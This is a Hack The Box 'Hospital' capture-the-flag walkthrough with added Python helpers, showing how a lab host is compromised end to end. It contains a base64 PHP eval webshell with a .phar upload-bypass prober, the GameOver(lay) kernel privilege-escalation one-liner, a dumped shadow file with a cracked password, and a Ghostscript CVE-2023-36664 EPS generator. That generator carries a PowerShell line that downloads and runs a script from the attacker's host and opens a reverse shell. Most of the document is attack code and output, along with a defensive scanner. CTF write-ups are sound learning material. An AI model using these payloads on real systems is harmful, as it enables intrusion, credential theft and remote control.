┌──(root㉿kali)-[~/Desktop/htb/hospital]
└─# rustscan -a 10.10.11.241 --ulimit 5000 -- -sCV
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 62 OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 e1:4b:4b:3a:6d:18:66:69:39:f7:aa:74:b3:16:0a:aa (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEOWkMB0YsRlK8hP9kX0zXBlQ6XzkYCcTXABmN/HBNeupDztdxbCEjbAULKam7TMUf0410Sid7Kw9ofShv0gdQM=
| 256 96:c1:dc:d8:97:20:95:e7:01:5f:20:a2:43:61:cb:ca (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGH/I0Ybp33ljRcWU66wO+gP/WSw8P6qamet4bjvS10R
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-05-26 22:11:05Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl? syn-ack ttl 127
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
1801/tcp open msmq? syn-ack ttl 127
2103/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
2105/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
2107/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
2179/tcp open vmrdp? syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
3269/tcp open globalcatLDAPssl? syn-ack ttl 127
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.hospital.htb
| Issuer: commonName=DC.hospital.htb
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6021/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
6404/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
6406/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
6407/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
6409/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
6613/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
6621/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
8080/tcp open http syn-ack ttl 62 Apache httpd 2.4.55 ((Ubuntu))
|_http-server-header: Apache/2.4.55 (Ubuntu)
| http-title: Login
|_Requested resource was login.php
|_http-open-proxy: Proxy might be redirecting requests
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
Service Info: Host: DC; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-05-26T22:12:04
|_ start_date: N/A
|_clock-skew: mean: 6h38m53s, deviation: 0s, median: 6h38m53s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 23222/tcp): CLEAN (Timeout)
| Check 2 (port 33349/tcp): CLEAN (Timeout)
| Check 3 (port 23197/udp): CLEAN (Timeout)
| Check 4 (port 57897/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
22/tcp open ssh syn-ack ttl 62
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
443/tcp open https syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
1801/tcp open msmq syn-ack ttl 127
2103/tcp open zephyr-clt syn-ack ttl 127
2105/tcp open eklogin syn-ack ttl 127
2107/tcp open msmq-mgmt syn-ack ttl 127
2179/tcp open vmrdp syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
6024/tcp open x11 syn-ack ttl 127
6404/tcp open boe-filesvr syn-ack ttl 127
6406/tcp open boe-processsvr syn-ack ttl 127
6407/tcp open boe-resssvr1 syn-ack ttl 127
6409/tcp open boe-resssvr3 syn-ack ttl 127
6612/tcp open unknown syn-ack ttl 127
6630/tcp open unknown syn-ack ttl 127
8080/tcp open http-proxy syn-ack ttl 62
9389/tcp open adws syn-ack ttl 127
A Windows host with 22/tcp (SSH) open is unusual. The --reason column explains it: 22 and 8080 answer with ttl 62 (initial TTL 64, i.e. Linux, two hops away), while every other port answers with ttl 127 (initial TTL 128, Windows, one hop away), and nmap's Service Info line lists both OSs. So 10.10.11.241 fronts two systems: the domain controller DC.hospital.htb, and an Ubuntu box (SSH plus Apache on 8080) one hop behind it. The second port list also shows 443/tcp open, which the service scan above did not report.
Port 8080 serves a login form (login.php).
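As an added example (not part of the original writeup), here is a small Python parser that makes the TTL split visible mechanically: it reads nmap/rustscan --reason port lines, groups open ports by observed TTL and maps each TTL to the nearest common initial TTL and the hop count that implies. The sample input is a constructed excerpt of the scan above, and the initial-TTL table (64 Linux/Unix, 128 Windows, 255 network gear) is the usual fingerprinting heuristic, not something the page states.

```python
import re
from collections import defaultdict

# Constructed sample: a few lines copied from the -sCV scan above, enough to
# show the split; not the full output.
SAMPLE_SCAN = """\
22/tcp open ssh syn-ack ttl 62 OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-05-26 22:11:05Z)
445/tcp open microsoft-ds? syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8080/tcp open http syn-ack ttl 62 Apache httpd 2.4.55 ((Ubuntu))
| http-title: Login
"""

# With --reason, nmap prints "syn-ack ttl N" on every port line; script
# output lines ("| ...") do not match and are skipped.
PORT_LINE = re.compile(
    r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s+syn-ack\s+ttl\s+(\d+)(?:\s+(.*))?$"
)

# Common initial TTLs (heuristic). Each router hop decrements by one, so the
# observed value sits just below one of these bases.
TTL_BASES = {64: "Linux/Unix", 128: "Windows", 255: "network device/BSD"}


def parse_ports(scan_text):
    """Return (port, proto, service, ttl, version) tuples for open ports."""
    rows = []
    for line in scan_text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            rows.append((int(m.group(1)), m.group(2), m.group(3),
                         int(m.group(4)), (m.group(5) or "").strip()))
    return rows


def guess_os(ttl):
    """Map an observed TTL to (OS family, hops) using the nearest base above it."""
    bases = [b for b in TTL_BASES if b >= ttl]
    if not bases:
        return ("unknown", 0)
    base = min(bases)
    return (TTL_BASES[base], base - ttl)


def group_by_ttl(scan_text):
    """Group open ports by observed TTL. Distinct TTLs behind one IP usually
    mean distinct hosts (port-forward, container or VM) behind that address."""
    groups = defaultdict(list)
    for port, _proto, _service, ttl, _version in parse_ports(scan_text):
        groups[ttl].append(port)
    return {ttl: sorted(ports) for ttl, ports in groups.items()}


def report(scan_text):
    """Human-readable summary, one line per TTL cluster."""
    lines = []
    for ttl, ports in sorted(group_by_ttl(scan_text).items()):
        os_name, hops = guess_os(ttl)
        lines.append(f"ttl {ttl}: {os_name}, {hops} hop(s) away -> ports {ports}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_SCAN)))
```

Feed it the full scan (`report(open("scan.txt").read())`) and any port whose TTL cluster differs from the rest is the one to treat as a separate host.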
┌──(root㉿kali)-[~/Desktop/htb/hospital]
└─# dirsearch -u http://10.10.11.241:8080 -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /root/Desktop/htb/hospital/reports/http_10.10.11.241_8080/_25-05-27_00-27-00.txt
Target: http://10.10.11.241:8080/
[00:27:00] Starting:
[00:27:02] 301 - 316B - /js -> http://10.10.11.241:8080/js/
[00:27:33] 200 - 0B - /config.php
[00:27:35] 301 - 317B - /css -> http://10.10.11.241:8080/css/
[00:27:40] 301 - 319B - /fonts -> http://10.10.11.241:8080/fonts/
[00:27:43] 301 - 320B - /images -> http://10.10.11.241:8080/images/
[00:27:46] 200 - 2KB - /login.php
[00:27:57] 200 - 2KB - /register.php
[00:28:07] 200 - 0B - /upload.php
[00:28:07] 301 - 321B - /uploads -> http://10.10.11.241:8080/uploads/
Task Completed
Among the results are a registration page, an upload handler (upload.php) and an uploads/ directory.
http://10.10.11.241:8080//register.php
Register an account first, then log in.
After login the only function is a file upload.
Uploading a PHP webshell directly fails: the upload filters on the file type.
So enumerate other extensions that the server-side PHP handler may still execute.
It turns out a .phar file is accepted and is executed as PHP (on Debian/Ubuntu the mod_php handler's FilesMatch covers .php, .phtml and .phar).
The environment is a bit quirky and I used a roundabout way to connect with Godzilla (a webshell manager); the uploaded file itself is a minimal eval shell:
echo 'PD9waHAgZWNobyAnMTIzJzsgZXZhbCgkX1BPU1RbJ3Bhc3MnXSk7Pz4=' | base64 -d > hack.php
# decodes to: <?php echo '123'; eval($_POST['pass']);?>
# (the trailing '=' padding is needed or GNU base64 -d reports "invalid input";
#  upload the file with the .phar extension found above)
The box periodically wipes the uploads directory, so turn the webshell into a reverse shell right away.
Upload linpeas to look for privilege-escalation vectors.
linpeas flags an old Ubuntu kernel, so a local kernel exploit is an option. The one-liner below is the public GameOver(lay) PoC (Ubuntu OverlayFS, CVE-2023-2640 / CVE-2023-32629): inside an unprivileged user and mount namespace it copies python3 into a lowerdir, grants it cap_setuid with setcap, mounts an overlay on top and touches the file to force a copy-up. Vulnerable Ubuntu kernels copy the capability xattr into the upperdir without re-checking the namespace, so u/python3 carries cap_setuid in the host namespace and can call setuid(0):
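Added example, not the author's tooling: a stdlib-only Python probe for the extension bypass described above. It uploads a marker-printing eval shell under each candidate extension, fetches it back from /uploads/ and classifies the response as executed, served_raw or missing (the last also covers the periodic clean-up). Assumptions: the upload form's file field is named "image", upload.php accepts multipart/form-data, and you pass your own PHPSESSID cookie; the extension list and marker are illustrative. Only the pure helpers run offline; probe() does the network I/O.

```python
import http.client
import uuid
from urllib.parse import urlparse

# Marker the shell prints when it is executed rather than served as text.
MARKER = "c0ffee-exec-ok"

# Extensions a PHP handler may still execute when only ".php" is blocked.
# On Debian/Ubuntu mod_php's FilesMatch is ".+\.ph(ar|p|tml)$"; the rest are
# legacy handlers worth one request each. (Assumed list, not from the page.)
CANDIDATE_EXTS = ["php", "phtml", "phar", "php3", "php4", "php5", "php7", "phps", "pht"]


def webshell_source(marker):
    """Minimal PHP eval shell, same shape as the base64 one above but with a
    distinctive marker in place of '123'."""
    return "<?php echo '%s'; eval($_POST['pass']); ?>" % marker


def candidate_filenames(stem, exts=CANDIDATE_EXTS):
    """One upload name per candidate extension."""
    return ["%s.%s" % (stem, ext) for ext in exts]


def classify(status, body, marker):
    """Decide what happened when the uploaded file is requested back."""
    if status == 404:
        return "missing"        # rejected by the filter, or already cleaned up
    if marker in body and "<?php" not in body:
        return "executed"       # PHP ran: this extension is handled by mod_php
    if "<?php" in body:
        return "served_raw"     # source disclosed but not executed
    return "other"


def multipart(field, filename, content, boundary):
    """Build a multipart/form-data body by hand (no third-party HTTP library)."""
    return (
        "--%s\r\n" % boundary
        + 'Content-Disposition: form-data; name="%s"; filename="%s"\r\n' % (field, filename)
        + "Content-Type: application/octet-stream\r\n\r\n"
        + content + "\r\n--%s--\r\n" % boundary
    ).encode()


def probe(base_url, cookie, field="image", stem=None):
    """Upload each candidate, fetch it from /uploads/<name>, classify.
    `field` ("image") is an assumption about the form; check it in the HTML."""
    u = urlparse(base_url)
    stem = stem or uuid.uuid4().hex[:8]
    results = {}
    for name in candidate_filenames(stem):
        boundary = uuid.uuid4().hex
        conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=10)
        conn.request(
            "POST", "/upload.php",
            body=multipart(field, name, webshell_source(MARKER), boundary),
            headers={"Content-Type": "multipart/form-data; boundary=" + boundary,
                     "Cookie": cookie},
        )
        conn.getresponse().read()           # drain before reusing the connection
        conn.request("GET", "/uploads/" + name, headers={"Cookie": cookie})
        r = conn.getresponse()
        results[name] = classify(r.status, r.read().decode(errors="replace"), MARKER)
        conn.close()
    return results


if __name__ == "__main__":
    import sys
    # usage: python3 probe.py http://10.10.11.241:8080 'PHPSESSID=...'
    for name, verdict in probe(sys.argv[1], sys.argv[2]).items():
        print(f"{verdict:11s} {name}")
```

Anything reported as executed is a working shell path; served_raw (typically .phps or a handler-less extension) still leaks your payload to anyone who can read uploads/, so delete those copies afterwards.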
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'
In /etc/shadow there is a real hash for the user drwilliams. Root's entry is yescrypt ($y$), which is far more expensive to attack; drwilliams' is sha512crypt ($6$, hashcat mode 1800):
root@webserver:/root# cat /etc/shadow
root:$y$j9T$s/Aqv48x449udndpLC6eC.$WUkrXgkW46N4xdpnhMoax7US.JgyJSeobZ1dzDs..dD:19612:0:99999:7:::
daemon:*:19462:0:99999:7:::
bin:*:19462:0:99999:7:::
sys:*:19462:0:99999:7:::
sync:*:19462:0:99999:7:::
games:*:19462:0:99999:7:::
man:*:19462:0:99999:7:::
lp:*:19462:0:99999:7:::
mail:*:19462:0:99999:7:::
news:*:19462:0:99999:7:::
uucp:*:19462:0:99999:7:::
proxy:*:19462:0:99999:7:::
www-data:*:19462:0:99999:7:::
backup:*:19462:0:99999:7:::
list:*:19462:0:99999:7:::
irc:*:19462:0:99999:7:::
_apt:*:19462:0:99999:7:::
nobody:*:19462:0:99999:7:::
systemd-network:!*:19462::::::
systemd-timesync:!*:19462::::::
messagebus:!:19462::::::
systemd-resolve:!*:19462::::::
pollinate:!:19462::::::
sshd:!:19462::::::
syslog:!:19462::::::
uuidd:!:19462::::::
tcpdump:!:19462::::::
tss:!:19462::::::
landscape:!:19462::::::
fwupd-refresh:!:19462::::::
drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:19612:0:99999:7:::
lxd:!:19612::::::
mysql:!:19620::::::
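Before cracking, it pays to triage the dump. The following added Python snippet (not from the original post) parses shadow-format lines, separates locked accounts (*, !, !*) from real hashes, maps the hash prefix to a hashcat mode and emits the command lines to run. The sample input is constructed with placeholder salts and hashes in the same formats as the dump above; the prefix-to-mode table is hashcat's documented mapping, and yescrypt is noted as having no hashcat mode.

```python
# Hash prefix -> (name, hashcat mode). yescrypt ($y$, the Ubuntu 22.04+
# default) has no hashcat mode; john --format=crypt can attack it, slowly.
HASH_TYPES = {
    "$y$": ("yescrypt", None),
    "$6$": ("sha512crypt", 1800),
    "$5$": ("sha256crypt", 7400),
    "$1$": ("md5crypt", 500),
    "$2b$": ("bcrypt", 3200),
    "$2y$": ("bcrypt", 3200),
}

# Constructed sample in /etc/shadow format; salts and hashes are placeholders
# with the same prefixes as the real dump above.
SAMPLE_SHADOW = """\
root:$y$j9T$EXAMPLESALT$EXAMPLEHASH:19612:0:99999:7:::
daemon:*:19462:0:99999:7:::
www-data:*:19462:0:99999:7:::
sshd:!:19462::::::
systemd-network:!*:19462::::::
drwilliams:$6$EXAMPLESALT$EXAMPLEHASH:19612:0:99999:7:::
lxd:!:19612::::::
"""


def parse_shadow(text):
    """Return (user, password_field) pairs; ignores blank/malformed lines."""
    entries = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) >= 2 and fields[0]:
            entries.append((fields[0], fields[1]))
    return entries


def classify_hash(field):
    """Return (label, hashcat_mode); mode is None when hashcat cannot run it."""
    if field == "":
        return ("empty (no password)", None)
    if field.startswith(("!", "*")):
        return ("locked", None)
    for prefix, info in HASH_TYPES.items():
        if field.startswith(prefix):
            return info
    return ("unknown", None)


def crackable(text):
    """Accounts with a real hash, grouped by hashcat mode (None = no mode)."""
    out = {}
    for user, field in parse_shadow(text):
        label, mode = classify_hash(field)
        if label in ("locked", "empty (no password)", "unknown"):
            continue
        out.setdefault(mode, []).append((user, field, label))
    return out


def hashcat_commands(text, wordlist="rockyou.txt"):
    """One hashcat invocation per mode; a comment for hashes hashcat lacks."""
    cmds = []
    for mode, rows in crackable(text).items():
        users = ",".join(u for u, _, _ in rows)
        if mode is None:
            cmds.append(f"# {rows[0][2]} ({users}): no hashcat mode; try john --format=crypt")
        else:
            cmds.append(f"hashcat -m {mode} hashes_{mode}.txt {wordlist}  # {users}")
    return cmds


if __name__ == "__main__":
    for mode, rows in crackable(SAMPLE_SHADOW).items():
        for user, field, label in rows:
            print(f"{user:12s} {label:12s} mode={mode}")
    print("\n".join(hashcat_commands(SAMPLE_SHADOW)))
```

Write each group's hash fields (one per line) to the hashes_<mode>.txt file the command names; sha512crypt with 5000 rounds is cheap enough that rockyou finishes in seconds on a GPU, as the run below shows, while the yescrypt root hash is best left for last.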
$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:qwe123!@#
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
Hash.Target......: $6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz...W192y/
Time.Started.....: Tue May 27 14:11:27 2025 (3 secs)
Time.Estimated...: Tue May 27 14:11:30 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 103.1 kH/s (7.74ms) @ Accel:512 Loops:64 Thr:128 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 262144/14344387 (1.83%)
Rejected.........: 0/262144 (0.00%)
Restore.Point....: 196608/14344387 (1.37%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4992-5000
Candidate.Engine.: Device Generator
Candidates.#1....: piggypie -> rebelde05
Hardware.Mon.#1..: Temp: 60c Util: 99% Core:2130MHz Mem:8001MHz Bus:8
That gives the plaintext password qwe123!@#. It is not obvious where it is used at first, but the port list also shows 443/tcp open, and https://10.10.11.241/ presents another login form; drwilliams / qwe123!@# logs in there.
https://10.10.11.241/
It is a webmail system, and the inbox holds one message:
Dear Lucy,
I want to remind you that the project for **lighter, cheaper and more eco-friendly needles is still underway** 💉. You need to send me the design drawings for these needles so I can hand them to the 3D printing department and start production right away. Please save the design files in **".eps" format**, so they can be viewed better with GhostScript.
Regards, Chris Brown
So the expected next step is to send him an .eps file, which he will open with GhostScript. That gives two angles: the .eps file format itself, and the GhostScript build that renders it.
A GitHub search turns up a PoC for CVE-2023-36664, a %pipe% device permission-validation bypass in Ghostscript, with an EPS generator built in:
┌──(root㉿kali)-[~/Desktop/tools/GhostScript/CVE-2023-36664-Ghostscript-command-injection]
└─# python3 CVE_2023_36664_exploit.py --generate --payload "powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.16.82/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.82 -Port 4321" --filename shell --extension eps
[+] Generated EPS payload file: shell.eps
The --payload argument must be wrapped in double quotes.
Start a listener locally, then send shell.eps to Chris Brown as an attachment.
The callback arrives shortly after:
┌──(root㉿kali)-[~]
└─# nc -lvnp 4321
listening on [any] 4321 ...
connect to [10.10.16.82] from (UNKNOWN) [10.10.11.241] 35466
Windows PowerShell running as user drbrown on DC
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Users\drbrown.HOSPITAL\Documents>whoami
hospital\drbrown
The user's credentials are in the drbrown.HOSPITAL\Documents directory:
PS C:\Users\drbrown.HOSPITAL\Documents>dir
Directory: C:\Users\drbrown.HOSPITAL\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/23/2023 3:33 PM 373 ghostscript.bat
PS C:\Users\drbrown.HOSPITAL\Documents> type ghostscript.bat
@echo off
set filename=%~1
powershell -command "$p = convertto-securestring 'chr!$br0wn' -asplain -force;$c = new-object system.management.automation.pscredential('hospital\drbrown', $p);Invoke-Command -ComputerName dc -Credential $c -ScriptBlock { cmd.exe /c "C:\Program` Files\gs\gs10.01.1\bin\gswin64c.exe" -dNOSAFER "C:\Users\drbrown.HOSPITAL\Downloads\%filename%" }"
PS C:\Users\drbrown.HOSPITAL\Documents>
Credentials: hospital\drbrown : chr!$br0wn
Note that the batch file runs gswin64c.exe with -dNOSAFER, which disables Ghostscript's file and pipe sandbox entirely, so any .eps that reaches this script can spawn commands through the %pipe% device whether or not the Ghostscript build is patched for CVE-2023-36664.
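Added example, not the PoC script used above: a Python helper showing both sides of the Ghostscript %pipe% trick, covering the CVE-2023-36664 EPS and the -dNOSAFER point just made. build_pipe_eps() writes the minimal EPS that opens the %pipe% device for writing, which is what makes Ghostscript spawn the command, and find_pipe_devices()/eps_verdict() scan an incoming .eps for %pipe% or | device strings, the check a mail gateway or the receiving batch script should run before handing a file to gs. The command string is an assumption for illustration.

```python
import re


def _ps_escape(s):
    """Escape a value for use inside a PostScript (...) string literal."""
    return s.replace("\\", "\\\\").replace("(", "\\(").replace(")", "\\)")


def build_pipe_eps(command):
    """Minimal EPS whose only content opens %pipe%<command> for writing.
    Ghostscript executes <command> when the file operator resolves the
    device; with -dSAFER this is what CVE-2023-36664 let through, and with
    -dNOSAFER (as in ghostscript.bat above) it is simply allowed."""
    return (
        "%!PS-Adobe-3.0 EPSF-3.0\n"
        "%%BoundingBox: 0 0 100 100\n"
        "%%EndComments\n"
        f"(%pipe%{_ps_escape(command)}) (w) file closefile\n"
        "showpage\n"
        "%%EOF\n"
    )


# A PostScript string literal whose value starts with %pipe% or |, allowing
# escaped parentheses/backslashes inside the command.
PIPE_DEVICE = re.compile(r"\((?:%pipe%|\|)((?:\\.|[^()\\])*)\)")


def find_pipe_devices(ps_text):
    """Return the command behind every %pipe%/| device string in a PS/EPS file."""
    found = []
    for m in PIPE_DEVICE.finditer(ps_text):
        found.append(re.sub(r"\\(.)", r"\1", m.group(1)))  # undo PS escaping
    return found


def eps_verdict(ps_text):
    """'allow' for files without pipe devices, otherwise a 'block:' reason."""
    cmds = find_pipe_devices(ps_text)
    if cmds:
        return "block: pipe device -> " + "; ".join(cmds)
    return "allow"


if __name__ == "__main__":
    # Illustrative command; any string works, it is only embedded in the EPS.
    sample = build_pipe_eps("powershell -c (Get-Date)")
    print(sample)
    print(eps_verdict(sample))
    print(eps_verdict("%!PS\n0 0 moveto 10 10 lineto stroke\nshowpage\n"))
```

A scanner like this is only a first line: PostScript can also assemble the device string at runtime (string concatenation, `cvs`, hex-encoded strings), so the durable fix is to run gs with -dSAFER on a patched build, never -dNOSAFER, and to rasterise untrusted files in a throwaway sandbox.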
Port 3389 (RDP) is open, so the same credentials give an interactive desktop:
PS C:\Users\drbrown.HOSPITAL\Documents> netstat -ano |findstr "3389"
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 536
TCP 10.10.11.241:3389 10.10.16.82:44328 CLOSE_WAIT 536
TCP [::]:3389 [::]:0 LISTENING 536
UDP 0.0.0.0:3389 *:* 536
UDP [::]:3389 *:* 536
xfreerdp /u:drbrown /v:10.10.11.241 /p:'chr!$br0wn' /size:1920x1080 /timeout:60000
On login a browser window is already open with the username and password filled in. Clicking Login does nothing; the password is rejected.
The user flag is on the Desktop:
8a06bcaa4927689eed7d1c1220c765ea
After closing that PowerShell window, a Selenium script starts right away and types the username and password into the form again.
I have to say this RDP session is really laggy.
And the password it types is still wrong for the portal, damn it.
Th3B3stH0sp1t4l9786!
It turns out this is not the portal's password but the Windows Administrator's password, which nxc confirms:
┌──(root㉿kali)-[~]
└─# nxc smb 10.10.11.241 -u administrator -p 'Th3B3stH0sp1t4l9786!'
SMB 10.10.11.241 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:hospital.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.241 445 DC [+] hospital.htb\administrator:Th3B3stH0sp1t4l9786! (Pwn3d!)
Log in over WinRM (5985/tcp) with Evil-WinRM as administrator and read the root flag:
*Evil-WinRM* PS C:\users\administrator> cd desktop
*Evil-WinRM* PS C:\users\administrator\desktop> dir
Directory: C:\users\administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/26/2025 7:41 PM 34 root.txt
*Evil-WinRM* PS C:\users\administrator\desktop> cat root.txt
49342235ce8451f5471cf93bc7c569ba